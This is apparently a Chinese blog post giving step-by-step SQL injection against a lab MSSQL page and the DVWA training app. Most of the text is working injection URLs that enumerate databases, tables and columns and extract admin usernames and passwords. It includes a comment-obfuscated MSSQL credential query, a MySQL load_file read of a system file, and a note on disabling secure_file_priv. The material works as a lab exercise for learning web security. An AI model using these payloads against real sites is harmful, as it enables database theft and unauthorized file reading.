2020-03-31public权限下获取数据库数据(mssql注入)、Mysql注入

public权限下获取数据库数据(mssql注入)

获取网站当前数据库

http://192.168.1.55/sqlserver/1.aspx?xxser=1 and db_name() =0--

数据库名名


爆表名及字段名

http://192.168.1.55/sqlserver/1.aspx?xxser=1 having 1=1--

表名及字段

http://192.168.1.55/sqlserver/1.aspx?xxser=1 group by admin.id having 1=1--

http://192.168.1.55/sqlserver/1.aspx?xxser=1group by admin.id,admin.name having 1=1--

http://192.168.1.55/sqlserver/1.aspx?xxser=1 and (select top 1 name from admin)>0

用户名

获取用户名和密码
http://192.168.1.55/sqlserver/1.aspx?xxser=1/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1

用户名和密码

Mysql注入

dvwa

查询数据库的版本。

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,version()+--+&Submit=Submit#

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20user(),database()+--+&Submit=Submit#

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x64767761+--+&Submit=Submit#


表名

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273+--+&Submit=Submit#


字段

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%20user,password%20from%20users+--+&Submit=Submit#

用户名和密码

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,load_file(%27c:\\boot.ini%27)+--+&Submit=Submit#


在mysql安装目录的my.ini文件中的[mysqld]添加secure_file_priv = ' '

执行命令show variables like '%secure%';查看secure_file_priv的值(这里已经将secure_file_priv的值设为空

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 安全级别:low 使用手工注入 目标:http://192.168.2.35/dvwa/vulnerabiliti...
    小浪崇礼阅读 392评论 0 1
  • 在黑客术语里面,”拖库“是指黑客入侵有价值的网络站点,把注册用户的资料数据库全部盗走的行为。因为谐音,也经常被称作...
    AI_Engine阅读 3,730评论 0 3
  • --batch 不询问用户选择,全部使用默认选项 sqlmap.py -g "inurl:\".php?id=1\...
    Instu阅读 747评论 0 1
  • 注意注入点是字符型的。然后通过order by 3确定两列字段。查找库名。注意group_concat 和conc...
    Ryans阅读 671评论 0 0
  • 作者:Gilberto Najera-Gutierrez译者:飞龙协议:CC BY-NC-SA 4.0 简介 这章...
    三月行者阅读 1,933评论 2 7